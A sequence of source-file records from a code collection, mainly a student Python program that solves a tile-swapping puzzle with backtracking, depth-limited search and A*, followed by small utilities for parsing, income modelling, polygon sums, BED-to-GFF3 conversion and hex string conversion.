deepest for DLS \"\"\"\n d = { \"2L\":6, \"2R\":5,\n \"1L\":4, \"1R\":3,\n \"3L\":2, \"3R\":1 }\n return d[op]\n \nclass Node:\n \"\"\"\n Node object to be used as the basic data structure for backtracking and graph search\n \"\"\"\n # static variables, accessible to all instances of the class\n identifier = 0\n\n def __init__(self, parent):\n # identifier\n self.id = self.identifier\n Node.identifier += 1\n # children\n self.L1 = None\n self.L2 = None\n self.L3 = None\n self.R1 = None\n self.R2 = None\n self.R3 = None\n # attributes common to all searchers\n self.parent = parent # parent node\n self.total_cost = None # total actual cost\n # attributes for Backtrack\n self.state_list = None\n self.operation_list = None\n # attributes for Graphsearch\n self.operation_applied = None\n self.state = None # state\n # attributes for DLS\n self.depth = None # depth\n # attributes for A/A*\n self.estimate_Fn = None # f*(n), cost estimate of start to goal through this node\n self.heuristic_value = None # h*(n), value from heuristic function\n self.estimate_Gn= None # g*(n), cost estimate from start node to this node\n\n def get_children(self):\n children = [self.L1, self.L2, self.L3, self.R1, 
self.R2, self.R3]\n return [child for child in children if child is not None]\n\n def is_leaf(self):\n children = [self.L1, self.L2, self.L3, self.R1, self.R2, self.R3]\n return all(child is None for child in children)\n\n def set_heuristic_value(self, x):\n self.heuristic_value = x\n self.estimate_Fn = self.estimate_Gn + self.heuristic_value\n\n def get_id_rep(self):\n return \"N\"+str(self.id)\n\n def remove_child(self, operation):\n if operation == \"1L\":\n self.L1 = None\n elif operation == \"2L\":\n self.L2 = None\n elif operation == \"3L\":\n self.L3 = None\n elif operation == \"1R\":\n self.R1 = None\n elif operation == \"2R\":\n self.R2 = None\n elif operation == \"3R\":\n self.R3 = None\n else:\n raise KeyError\n# ---------------------------------------------- General Functions ------------------------------------------------- #\n\ndef apply_operation(problem_state, operation):\n \"\"\" Applies operation to a configuration of the problem state, return new configuration \"\"\"\n new_configuration = problem_state[:]\n e_index = new_configuration.index(\"E\")\n if operation == \"1L\":\n new_configuration[e_index], new_configuration[e_index - 1] = new_configuration[e_index - 1], new_configuration[e_index]\n elif operation == \"2L\":\n new_configuration[e_index], new_configuration[e_index - 2] = new_configuration[e_index - 2], new_configuration[e_index]\n elif operation == \"3L\":\n new_configuration[e_index], new_configuration[e_index - 3] = new_configuration[e_index - 3], new_configuration[e_index]\n elif operation == \"1R\":\n new_configuration[e_index], new_configuration[e_index + 1] = new_configuration[e_index + 1], new_configuration[e_index]\n elif operation == \"2R\":\n new_configuration[e_index], new_configuration[e_index + 2] = new_configuration[e_index + 2], new_configuration[e_index]\n elif operation == \"3R\":\n new_configuration[e_index], new_configuration[e_index + 3] = new_configuration[e_index + 3], new_configuration[e_index]\n else:\n raise ValueError\n return new_configuration\n\ndef check_goal_state(problem_state):\n \"\"\" Check if the problem_state is the goal state given the constraints that the problem\n - can only have 7 characters which are elements of {'W','B','E'}\n - there is at least one of each character\n \"\"\"\n count_w = problem_state.count(\"W\")\n # check for the condition that there are no B's on the left side and all W's on the left side ignoring the E\n if problem_state[:count_w + 1].count(\"B\") == 0 and problem_state[:count_w + 1].count(\"W\") == count_w: # allow + 1 for E\n return True\n if problem_state[:count_w].count(\"B\") == 0 and problem_state[:count_w].count(\"W\") == count_w:\n return True\n return False\n\ndef get_operations(problem_state):\n \"\"\"\n operation ordering: 2L, 1L, 2R, 1R, 3L, 3R\n score : 1 2 3 4 5 6\n\n each move will have (\"move\", score)\n\n list of possible operations will be sorted by score\n - if we assume picking preferred operations will allow us to find the result faster this will help\n - if not, the overhead in sorting 6 items is not to much\n\n :param problem_state: node representing state of puzzle\n :return: list of possible operations sorted by score\n \"\"\"\n operations = []\n e_index = problem_state.index(\"E\")\n if e_index - 1 >= 0: # check can move left 1 space\n move = (\"1L\", 2)\n operations.append(move)\n if e_index - 2 >= 0: # check can move left 2 space, jump 1 tile\n move = (\"2L\", 1)\n operations.append(move)\n if e_index - 3 >= 0: # check can move left 3 spaces, jump 2 tiles\n move = 
(\"3L\", 5)\n operations.append(move)\n n = len(problem_state) - 1\n if e_index + 1 <= n: # check can move right 1 space\n move = (\"1R\", 4)\n operations.append(move)\n if e_index + 2 <= n: # check can move right 2 spaces, jump 1 tile\n move = (\"2R\", 3)\n operations.append(move) # check can move right 3 spaces, jump 2 tiles\n if e_index + 3 <= n:\n move = (\"3R\", 6)\n operations.append(move)\n operations.sort(key = lambda t:t[1]) # sort by index 1 of each tuple\n return [op[0] for op in operations]\n\ndef get_operation_cost(op):\n \"\"\" Maps operation to a cost \"\"\"\n operation_costs = {\n \"1L\": 1, \"1R\": 1,\n \"2L\": 1, \"2R\": 1,\n \"3L\": 2, \"3R\": 2\n }\n cost = operation_costs[op]\n return cost\n\ndef find_solution(goal_node, procedure_name):\n \"\"\" Given a node with the goal state, find the path to the solution via\n iterating through parent nodes \"\"\"\n path = [] # will contain the solution from goal to root\n current_node = goal_node\n while current_node.parent is not None:\n if procedure_name == \"BK\":\n state = current_node.state_list[-1]\n else:\n state = current_node.state\n information = (current_node.operation_applied, state, current_node.total_cost)\n path.append(information)\n current_node = current_node.parent\n # for start state\n if procedure_name == \"BK\":\n state = current_node.state_list[-1]\n else:\n state = current_node.state\n information = (\"start\", state, current_node.total_cost)\n path.append(information)\n return path[::-1]\n\n# ---------------------------------------------- Backtrack Functions ----------------------------------------------- #\n\ndef backtrack(node, flag):\n \"\"\" Backtrack implementation to solve the puzzle\n :param node: start node with the problem_state\n :param flag: flag to be used in diagnostic mode\n :return: node with state of the goal\n \"\"\"\n current_state = node.state_list[-1] # last item in state list is newest state\n for state in node.state_list[:-1]: # check if this state has been seen before\n if current_state == state:\n if flag >= 1:\n flag -= 1\n print(\"Backtrack due to ANCESTOR\")\n write_diagnostic_info(\"Backtrack due to ANCESTOR\")\n return False\n # Chris: check for deadend state?\n if check_goal_state(current_state): # check goal state\n return node\n if len(node.state_list) > 10: # check bound\n if flag >= 1:\n flag -= 1\n print(\"Backtrack due to BOUND REACHED\")\n write_diagnostic_info(\"Backtrack due to BOUND REACHED\")\n return False\n\n operations = get_operations(current_state)[::-1] # get possible operations\n\n while len(operations) > 0: # while there are operations that can be done\n best_operation = operations.pop() # last item in operations is best operation\n new_state = apply_operation(current_state, best_operation) # apply best operation to obtain new state\n # extend state and operation lists\n extended_state_list = node.state_list[:]\n extended_state_list.append(new_state)\n extended_op_list = node.operation_list[:]\n extended_op_list.append(best_operation)\n\n next_node = Node(node) # create node for new state\n next_node.state_list = extended_state_list # update entries for the new node\n next_node.operation_list = extended_op_list\n next_node.operation_applied = best_operation\n next_node.total_cost = node.total_cost + get_operation_cost(best_operation)\n\n # for diagnostic node, each time operator is applied print:\n # the operator, identifier of generated node, available operators, list of moves executed so far\n if flag >= 1:\n flag -= 1\n print(\"Current op: \" + 
str(best_operation) + \", id: \" + str(next_node.get_id_rep()) +\n \", Available op(s): \" + str(operations) + \", Ops so far\" + str(next_node.operation_list))\n write_diagnostic_info(\"Current op: \" + str(best_operation) + \", id: \" + str(next_node.get_id_rep()) +\n \", Available op(s): \" + str(operations) + \", Ops so far\" + str(next_node.operation_list))\n result = backtrack(next_node, flag) # backtrack\n if result:\n return result # return node with goal state\n else:\n pass # loop\n if flag >= 1:\n flag -= 1\n print(\"Backtrack due to NO MORE OPS\")\n write_diagnostic_info(\"Backtrack due to NO MORE OPS\")\n return False\n\n# -------------------------------------------- Graphsearch Functions ----------------------------------------------- #\n\ndef print_structure(root):\n children = root.get_children()\n print(print_info([root]))\n print_structure_aux(children)\n\ndef print_structure_aux(children):\n if children:\n print_info(children)\n for child in children:\n kids = child.get_children()\n print_structure_aux(kids)\n\ndef print_info(node_list):\n node = node_list[-1]\n if node.parent is not None:\n p = node.parent.get_id_rep()\n else:\n p = \"root\"\n print(\"Parent: \" + str(p), end = \" \")\n\n for node in node_list:\n print(\"id: \" + str(node.get_id_rep()) + \", state: \" + str(node.state), end=\" $ \")\n print(\"\",end=\"\\n\")\n\ndef add_to_dict(node, procedure_name, dictionary):\n \"\"\" Adds an entry to either closed or open\n entries stored as\n key = (node object, node_value)\n where\n - key is the state of the problem\n - node object is a node\n - node_value is an attribute of node that determines the order of expansion\n \"\"\"\n key = str(node.state)\n if procedure_name == \"DLS\":\n dls_comparator = DLS_Comparator(node.depth, node.operation_applied)\n dictionary[key] = node, dls_comparator\n elif procedure_name == \"A\":\n a_comparator = A_Comparator(node.estimate_Fn, node.operation_applied, node.id)\n dictionary[key] = node, a_comparator\n else:\n raise KeyError\n\ndef get_node_to_expand(open, procedure_name):\n \"\"\" Gets best node to expand based on the node_value and procedure name\n elements are stored in open as\n e = (key, (node, node_value))\n e[0] = key\n e[1][0] = node\n e[1][1] = comparator\n\n where\n - key = node.state\n - node is the node\n - node_value is either\n - id for DLS, pick deepest/one created first\n - estimate_Fn for A/A*, pick smallest\n open_sorted is sorted by node_value in ascending order (smallest to largest)\n so if the procedure_name is \"A\", reverse it and pop the last element\n \"\"\"\n open_sorted = sorted(open.items(), key=lambda t:t[1][1]) # sort open\n if procedure_name == \"DLS\": # biggest comparator is best to expand\n node = open_sorted.pop()[1][0]\n elif procedure_name == \"A\":\n node = open_sorted[::-1].pop()[1][0] # smallest fn is first, best operation has smallest value\n else: # associated so if 2 nodes have same fn, the better operation will tie break\n raise KeyError\n\n del open[str(node.state)] # delete entry from open\n return node\n\ndef check_not_ancestor(new_state, parent):\n \"\"\" Given a state, check if it has been seen in an ancestor node \"\"\"\n current_node = parent\n while current_node is not None: # check state of all ancestors\n if new_state == current_node.state:\n return False\n current_node = current_node.parent\n return True\n\ndef generate_children(parent, operations, open, closed, procedure_name, flag):\n \"\"\" Creates a child node for each valid operation\n returns children in order of 
[worst, .. , best] as we create the child with the best operation last so\n it has a bigger id and is expanded earlier\n children are guaranteed\n - to not be an ancestor (prevent cycles)\n - to be new (not seen before), uses pointer redirection if it has been seen\n \"\"\"\n children = []\n for operation in operations:\n new_state = apply_operation(parent.state[:], operation) # apply operation to current state of the node\n if procedure_name == \"DLS\":\n new_cost = parent.total_cost + get_operation_cost(operation)\n else:\n new_cost = parent.total_cost + heuristic_function(new_state)\n\n if check_not_ancestor(new_state, parent): # check if ancestor\n # check if has been seen before, does pointer redirection if needed\n in_open_closed = check_node_open_closed(new_state, new_cost, operation, parent, open, closed, procedure_name, flag)\n\n if in_open_closed:\n pass\n else:\n child = Node(parent) # child points to parent\n if procedure_name == \"DLS\":\n child.depth = parent.depth + 1 # update child depth\n child.total_cost = new_cost # update child total cost\n else:\n child.estimate_Gn = parent.total_cost # update child g(n)\n child.set_heuristic_value(heuristic_function(new_state)) # update child h(n) and f(n)\n child.total_cost = parent.total_cost + get_operation_cost(operation)\n child.state = new_state\n child.operation_applied = operation\n children.append(child) # add unseen child to children\n\n if flag >= 1:\n if procedure_name == \"DLS\":\n print(\"Node Generated\\noperator: \" + str(child.operation_applied) + \", id: \" + str(child.get_id_rep())\n + \", parent (id, state): (\" + str(parent.get_id_rep() + \",\" + str(parent.state)) +\")\"\n + \", cost of reaching node - g(n) = \" + str(child.total_cost))\n\n write_diagnostic_info(\"Node Generated\\noperator: \" + str(child.operation_applied) + \", id: \" + str(child.get_id_rep())\n + \", parent (id, state): (\" + str(parent.get_id_rep() + \",\" + str(parent.state)) +\")\"\n + \", cost of reaching node - g(n) = \" + str(child.total_cost))\n else:\n print(\"Node Generated\\noperator: \" + str(child.operation_applied) + \", id: \" + str(child.get_id_rep())\n + \", parent (id, state): (\" + str(parent.get_id_rep() + \",\" + str(parent.state)) +\")\"\n + \", g(n) = \" + str(child.estimate_Gn) + \", h(n) = \" + str(child.heuristic_value) + \", f(n) = \" + str(child.estimate_Fn))\n\n write_diagnostic_info(\"Node Generated\\noperator: \" + str(child.operation_applied) + \", id: \" + str(child.get_id_rep())\n + \", parent (id, state): (\" + str(parent.get_id_rep() + \",\" + str(parent.state)) +\")\"\n + \", g(n) = \" + str(child.estimate_Gn) + \", h(n) = \" + str(child.heuristic_value) + \", f(n) = \" + str(child.estimate_Fn))\n return children\n\ndef point_parent_to_child(parent, child):\n \"\"\" Points the parent node's corresponding pointer to the child node \"\"\"\n if child.operation_applied == \"1L\":\n parent.L1 = child\n elif child.operation_applied == \"2L\":\n parent.L2 = child\n elif child.operation_applied == \"3L\":\n parent.L3 = child\n elif child.operation_applied == \"1R\":\n parent.R1 = child\n elif child.operation_applied == \"2R\":\n parent.R2 = child\n elif child.operation_applied == \"3R\":\n parent.R3 = child\n else:\n raise ValueError\n\ndef check_node_open_closed(new_state, new_cost, new_operation, parent, open, closed, procedure_name, flag):\n \"\"\" Check if a node has been seen before either in open or in closed\n Node is guaranteed to\n - appear at max once in either open or closed\n - if it is seen before, it 
will not be because of an ancestor on the same path\n :return: True if seen before, else False\n \"\"\"\n for key in open.keys(): # keys are states\n if str(new_state) == key: # seen this state before\n other = open[key] # other is the other node that has the same state\n other_node = other[0]\n if procedure_name == \"DLS\":\n other_cost = other_node.total_cost\n else:\n other_cost = other_node.estimate_Fn\n if other_cost >= new_cost:\n # the new node's state is cheaper to get to so new node will be better\n # make the other node point to new node's parent and update cost details\n # move the children of the other node to new node\n # update children and put children that are leaves back in open so they can be expanded\n # note: this is conceptual, the new node is never created, just the other node's pointers change\n # along with costs to the values of the would be node\n #if procedure_name == \"A\":\n # if other_cost == new_cost:\n # print(\"EQUAL - O\")\n # else:\n # print(\"OTHER IS GREATER THAN FOUND A BETTER WAY - O\")\n pointer_redirection(other[0], new_cost, new_operation, parent, open, closed, procedure_name, flag)\n else:\n # other is cheaper\n # don't make a node as this graphsearch, can't have duplicate nodes\n # no point exploring this path because it is more expensive and we can't include a new node\n pass\n return True\n\n for key in closed.keys():\n if str(new_state) == key: # seen this state before\n other = closed[key] # other is the other node that has the same state\n other_node = other[0]\n if procedure_name == \"DLS\":\n other_cost = other_node.total_cost\n else:\n other_cost = other_node.estimate_Fn\n if other_cost >= new_cost:\n #if procedure_name == \"A\":\n # if other_cost == new_cost:\n # print(\"EQUAL - O\")\n # else:\n # print(\"OTHER IS GREATER THAN FOUND A BETTER WAY - O\")\n pointer_redirection(other[0], new_cost, new_operation, parent, open, closed, procedure_name, flag)\n else:\n pass\n return True\n return False\n\ndef pointer_redirection(old_node, new_cost, new_operation, parent, open, closed, procedure_name, flag):\n \"\"\" Updates parent and the follow for the old node (seen state)\n - total_cost and depth in DLS\n - f(n) estimate in A and total)cost\n For each of the old node's children, update their values (as above)\n Add each of the leaves of the subtree to open so they can be expanded again\n \"\"\"\n if flag >= 1:\n print(\"Node \" + (old_node.get_id_rep()) + \"'s state has been repeated - redirecting as needed\")\n write_diagnostic_info(\"Node \" + (old_node.get_id_rep()) + \"'s state has been repeated - redirecting as needed\")\n old_operation = old_node.operation_applied\n old_parent = old_node.parent\n # if old_parent.get_id_rep() == \"N58\":\n # print(\"Here\")\n if old_parent: # if not None\n old_parent.remove_child(old_operation)\n\n old_node.parent = parent # update parent\n old_node.operation_applied = new_operation # update operation to get to old node\n point_parent_to_child(old_node.parent, old_node) # make parent point to child\n\n if procedure_name == \"DLS\":\n old_node.total_cost = new_cost # update total cost\n old_node.depth = parent.depth + 1 # update depth\n else:\n old_node.estimate_Gn = parent.total_cost # update g(n)\n old_node.set_heuristic_value(heuristic_function(old_node.state)) # update f(n) and h(n)\n\n old_node.total_cost = parent.total_cost + get_operation_cost(new_operation)\n\n deepest = [] # holds leaves\n children = old_node.get_children()\n for child in children:\n if child.is_leaf():\n deepest.append(child)\n 
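# Subtree walk note: 'children' is extended with each child's successors further down, so\n # this loop is effectively a breadth-first sweep over the whole redirected subtree,\n # refreshing every descendant's costs from its (possibly new) parent.\n 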
if procedure_name == \"DLS\": # update child's details\n child.depth = child.parent.depth + 1 # update depth\n child.total_cost = child.parent.total_cost + get_operation_cost(child.operation_applied) # update total cost\n else:\n child.estimate_Gn = child.parent.total_cost + get_operation_cost(child.operation_applied) # update g(n)\n child.set_heuristic_value(heuristic_function(child.state)) # update f(n) and h(n)\n child.total_cost = child.parent.total_cost + get_operation_cost(new_operation) # update actual cost\n successors = child.get_children() # get child's children\n for s in successors:\n children.append(s)\n for leaf in deepest:\n if leaf in open:\n pass\n elif leaf in closed: # add leaf to open to be expanded\n del closed[leaf.state] # remove leaf from closed\n add_to_dict(leaf, procedure_name, open)\n\ndef dictionary_to_list(dict):\n \"\"\" Formats the contents of dict to be of the form\n (identifier, state) for each node \"\"\"\n return [(n[1][0].get_id_rep(), n[1][0].state) for n in dict.items()]\ndef heuristic_function(problem_state):\n \"\"\" Heuristic function based on the minimum possible cost to get to the goal state degrading the rules of\n the only moving the empty tile, thus will be <= actual cost\n - As h(n) <= h*(n), heuristic cost <= actual cost to get from problem_state to goal state, h is admissible\n - For all children of the node containing this state,\n\n \"\"\"\n count_w = problem_state.count(\"W\")\n buffer = 0\n if \"E\" in problem_state[:count_w]:\n buffer += 1\n copy = problem_state[:]\n cost = 0\n w_encountered = 0\n for i in range(len(copy)):\n if copy[i] == \"W\":\n w_encountered += 1\n if w_encountered == count_w:\n break\n elif copy[i] == \"B\":\n index_first_b = i\n index_first_w = \"\".join(copy).find(\"W\", i, len(copy))\n\n if index_first_w < 0:\n break\n difference = abs(index_first_w - index_first_b)\n if difference <= 2:\n cost += 1\n elif difference <= 4:\n cost += 2\n elif difference == 5:\n cost += 4\n elif difference == 6:\n cost += 5\n else:\n print(difference)\n raise ValueError\n copy[index_first_w], copy[index_first_b] = copy[index_first_b], copy[index_first_w]\n return cost\n\ndef graphsearch(problem_state, procedure_name, flag):\n \"\"\" Graphserach implementation of A & DLS \"\"\"\n root = Node(None)\n root.state = list(problem_state)\n if procedure_name == \"DLS\": # set up for DLS\n root.depth = 0\n else: # set up for A/A*\n root.estimate_Gn = 0\n root.set_heuristic_value(heuristic_function(root.state))\n root.total_cost = 0\n open = {} # open set\n add_to_dict(root, procedure_name, open) # add element to open\n closed = {} # closed set\n while(True):\n if len(open) <= 0: # no more operations\n return False\n node = get_node_to_expand(open, procedure_name) # find best node to expand based on id for DLS, f(n) for A\n # if node.get_id_rep() == \"N64\":\n # print_structure(root)\n # else:\n # print(node.get_id_rep())\n add_to_dict(node, procedure_name, closed) # add node to closed\n if check_goal_state(node.state): # check goal state\n return node # return node with goal state\n if procedure_name == \"DLS\": # check depth limit in DLS\n if node.depth >= 70:\n return False\n operations = get_operations(node.state) # get all possible operations from this state\n # generate children that are not ancestors of current path (so no cycle)\n # also checks if it has been seen before and does pointer redirection if needed\n if flag >= 1:\n if procedure_name == \"A\":\n print(\"Node Expanded\\nid: \" + str(node.get_id_rep()) + \", operation 
expansion order: \" + str(operations) + \", g(n) = \" + str(node.estimate_Gn)\n + \", h(n) = \" + str(node.heuristic_value) + \", f(n) = \" + str(node.estimate_Fn) + \"\\nOpen: \" + str(dictionary_to_list(open))\n + \"\\nClosed: \" + str(dictionary_to_list(closed)))\n\n write_diagnostic_info(\"Node Expanded\\nid: \" + str(node.get_id_rep()) + \", operation expansion order: \" + str(operations) + \", g(n) = \" + str(node.estimate_Gn)\n + \", h(n) = \" + str(node.heuristic_value) + \", f(n) = \" + str(node.estimate_Fn) + \"\\nOpen: \" + str(dictionary_to_list(open))\n + \"\\nClosed: \" + str(dictionary_to_list(closed)))\n else:\n print(\"Node Expanded\\nid: \" + str(node.get_id_rep()) + \", operation expansion order: \" + str(operations) + \", cost of reaching node - g(n): \" + str(node.total_cost)\n + \"\\nOpen: \" + str(dictionary_to_list(open)) + \"\\nClosed: \" + str(dictionary_to_list(closed)))\n\n write_diagnostic_info(\"Node Expanded\\nid: \" + str(node.get_id_rep()) + \", operation expansion order: \" + str(operations) + \", cost of reaching node - g(n): \" + str(node.total_cost)\n + \"\\nOpen: \" + str(dictionary_to_list(open)) + \"\\nClosed: \" + str(dictionary_to_list(closed)))\n children = generate_children(node, operations, open, closed, procedure_name, flag)\n for child in children:\n point_parent_to_child(node, child) # make node point to it's child\n add_to_dict(child, procedure_name, open) # add child to open set\n\n flag -= 1\n# ----------------------------------------------- I/O functions ------------------------------------------------- #\n\ndef solve_puzzle(problem_state, procedure_name, output_file_name, flag):\n global makef\n makef = True\n if procedure_name == \"BK\":\n node = Node(None)\n node.state_list = [list(problem_state)]\n node.operation_list = []\n node.total_cost = 0\n result = backtrack(node, flag)\n elif procedure_name == \"DLS\":\n result = graphsearch(problem_state, \"DLS\", flag)\n elif procedure_name == \"A\":\n result = graphsearch(problem_state, \"A\", flag)\n else:\n print(\"Invalid input\")\n path = find_solution(result, procedure_name)\n write_solution(output_file_name, path)\n\ndef write_solution(output_file_name, path):\n global makef\n if makef:\n f = open(output_file_name, \"w\")\n makef = False\n else:\n f = open(output_file_name, \"a\")\n for segment in path:\n f.write(str(segment[0]) + \"\\t\" + str(\"\".join(segment[1])) + \"\\t\" + str(segment[2]) + \"\\n\")\n f.close()\n\ndef write_diagnostic_info(info):\n global makef\n if makef:\n f = open(output_file_name, \"w\")\n makef = False\n else:\n f = open(output_file_name, \"a\")\n f.write(info+\"\\n\")\n f.close()\n\nif __name__ == \"__main__\":\n # puzzle-string procedure-name outputfile-name Flag\n global output_file_name\n\n import sys\n puzzle_string = sys.argv[1]\n procedure_name = sys.argv[2]\n output_file_name = sys.argv[3]\n flag = int(sys.argv[4])\n #puzzle_string = 'BBBWWWE'\n #procedure_name = \"DLS\"\n #output_file_name = \"testcase_BBBWWWE_DLS\"\n #flag = 0\n\n output_file_name = output_file_name+\".txt\"\n solve_puzzle(puzzle_string, procedure_name, output_file_name, flag)\n\n \"\"\" To run from terminal/cmd line\n Davids-MacBook-Pro-2:Assignment1_Submission David$ python3 solvepuzzle.py BBBWWWE DLS DLS_out 0\n Davids-MacBook-Pro-2:Assignment1_Submission David$ python3 solvepuzzle.py BBBWWWE A A_out 0\n Davids-MacBook-Pro-2:Assignment1_Submission David$ python3 solvepuzzle.py BBBWWWE BK BK_out 0\n \"\"\"\n \"\"\"\n def test_heuristic_function():\n states = 
[(\"BWWWWBEB\",\"S\"), (\"BWWWWEBB\",\"1L\"), (\"BWWEWWBB\", \"2L\"),(\"EWWBWWBB\", \"3L\"), (\"WWEBWWBB\",\"2R\"),(\"WWWBWEBB\",\"3R\"),(\"WWWEWBBB\",\"2L\")]\n for i in range(1,len(states)-1):\n hn = heuristic_function(list(states[i-1][0]))\n hm = heuristic_function(list(states[i][0]))\n cnm = get_operation_cost(states[i][1])\n print(\"h(n) = \" + str(hn))\n print(\"h(m) = \" + str(hm))\n print(\"c(n,m) = \" + str(cnm))\n print(\" h(n) <= c(n,m) + h(m) | \" + str(hn) + \" <= \" + str(cnm+hm))\n test_heuristic_function()\n \"\"\"\n \"\"\"\n start BWWWWBEB 0\n 1L BWWWWEBB 1\n 2L BWWEWWBB 2\n 3L EWWBWWBB 4\n 2R WWEBWWBB 5\n 3R WWWBWEBB 7\n 2L WWWEWBBB 8\n \"\"\"","sub_path":"FIT3080-Intelligent-Systems/A1-Searches-Backtracking-DLS-A*/solvepuzzle.py","file_name":"solvepuzzle.py","file_ext":"py","file_size_in_byte":36145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"235496367","text":"import Parse_Revised\n\nParse_Revised.readParserDefinitions(\"sampleRules.dat\")\n\nglobal sentences\nsentences = []\n\nParse_Revised.debug_print = False\n\ndef gather(sentence_string):\n global sentences\n sentences.append(sentence_string.rstrip().split(\" \"))\n \nhandle = open(\"sentences.txt\", 'r')\nfor sentence in handle:\n gather(sentence)\nhandle.close()\n\nfor sentence in sentences:\n print\n Parse_Revised.parse(sentence)","sub_path":"Parser/runParse_revised.py","file_name":"runParse_revised.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"496550462","text":"import numpy as np\nfrom randomwalkincome import randomwalkincome\n\n# Model Parameters\nN = 20\t\t# number of grid points of assets\nI = 10\t\t# number of grid points of permanent income\nT = 45\t\t# number of periods total\nR = 15\t\t# number of periods in retirement\n\n# Income\ninc_work = 15000*np.ones((1, T-R))\ninc_ret = 5000*np.ones((1,R))\ninc = np.hstack((inc_work, inc_ret))\n\n# Labor Supply\nwork = np.hstack((np.ones((1, T-R)), np.zeros((1, R))))\n\n# Random Income Component\nsigma = 0.5\nTransP, RI = randomwalkincome(I, sigma)\nRandInc = np.exp(RI)\n# Income variables\n\ninc_unc = np.ones((I, T))\nfor i in xrange(I):\n\tprint\n\tfor t in xrange(T):\n\t\tinc_unc[i,t] = max(0, inc[0,t]*RandInc[i])\n\n# Other Parameters\nbeta = 0.98\nr = 0.03\ngamma = 1.5\npsi = 0.003\n\n# Wealth Grid\nWealthGrid = np.linspace(-200000, 2000000, N).reshape((N, 1))\n\n#Find where grid is 0\na0 = abs(WealthGrid).argmin()","sub_path":"simple/python/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"381145634","text":"import math\n\ndef polysum(n,s):\n sum = 0\n\n area = (0.25*n*(s**2))/(math.tan(math.pi/n))\n lengthSquared = (n * s)**2 \n\n sum = area + lengthSquared\n return round(sum,4)","sub_path":"Python/Eksempler/regularPolynom.py","file_name":"regularPolynom.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"312560870","text":"'''\nConverts a BED format file to a gff3-like file for input into scripts that require it.\n'''\nfrom optparse import OptionParser\nimport sys\nimport re\n\ndef parse_options():\n\tparser = OptionParser()\n\tparser.add_option(\"-f\", \"--bed_file\", dest=\"bed_file\",\n\t\t\t\t\t help=\"BED file\", metavar=\"BEDFILE\")\n\t(options, args) = 
parser.parse_args()\n\treturn options\n\noptions = parse_options()\ninfile = open(options.bed_file, 'r')\noutfile = open(re.sub('bed','gff3', options.bed_file),'w')\n\nfor line in infile:\n\tline = line.rstrip()\n\titems = line.split()\n\toutfile.write(items[0] + '\\t.\\t' + items[3] + '\\t' + items[1] + '\\t' + items[2] + '\\t' + items[4] + '\\t.\\t.\\t.\\n')\n\ninfile.close()\noutfile.close()","sub_path":"BED_to_gff_v1.py","file_name":"BED_to_gff_v1.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"483739380","text":"\n\n#class header\nclass _PEDOMETER():\n\tdef __init__(self,): \n\t\tself.name = \"PEDOMETER\"\n\t\tself.definitions = [u'a device that measures how far someone has walked by counting the number of times the feet are raised and put down again']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_pedometer.py","file_name":"_pedometer.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"182288568","text":"\n\n# *********************************************************************\ndef Convert_Str_to_Bytearray(text_in):\n '''\n :param text_in:\n :param bytearray_out:\n :return:\n '''\n if isinstance(text_in, str):\n bytearray_out = bytearray(b'')\n for data in text_in:\n bytearray_out += ord(data).to_bytes(1, 'big')\n return bytearray_out\n else:\n return None\n\n# *********************************************************************\ndef Convert_HexStr_to_Bytearray(text_in):\n '''\n :param text_in:\n :param bytearray_out:\n :return:\n '''\n if isinstance(text_in, str):\n bytearray_out = bytearray(b'')\n i = 0\n strLength = len(text_in)\n while i < strLength:\n convStr = text_in[i:i+2]\n bytearray_out += int(convStr, 16).to_bytes(1, 'big')\n i+=2\n return bytearray_out\n else:\n return None\n\n# *********************************************************************\ndef Convert_HexStr_to_Str(text_in, start, end):\n '''\n :param text_in:\n :param str_out:\n :return:\n '''\n if isinstance(text_in, str):\n str_out = ''\n i = start\n strLength = len(text_in[:end])\n while i < strLength:\n convStr = text_in[i:i+2]\n str_out += chr(int(convStr, 16))\n i+=2\n return str_out\n else:\n return None\n\ndef Convert_ArrBite_to_ArrChar(data):\n '''\n #*********************************************************************\n # extract a number as a str from data in byte format\n # [data] - data in byte format\n #*********************************************************************\n '''\n text = ''\n lenData = len(data)\n for i in range(lenData):\n text += chr(data[i])\n return text\n\ndef Convert_ArrBite_to_ArrCharHex(data):\n '''\n #*********************************************************************\n # convert byte characters into a sequence of hex characters\n # [data] - data in byte format\n #*********************************************************************\n '''\n text = ''\n lenData = len(data)\n try:\n for i in range(lenData):\n if int(data[i]) > 0x0f:\n text += hex(data[i])[2:]\n else:\n text += '0' + hex(data[i])[2:]\n except:\n return ''\n return text\n\n
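# Usage sketch (illustrative values, not part of the original file):\n# Convert_Str_to_Bytearray('AB') -> bytearray(b'AB')\n# Convert_HexStr_to_Bytearray('0f10') -> bytearray(b'\\x0f\\x10')\n# Convert_HexStr_to_Str('48656c6c6f', 0, 10) -> 'Hello'\n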
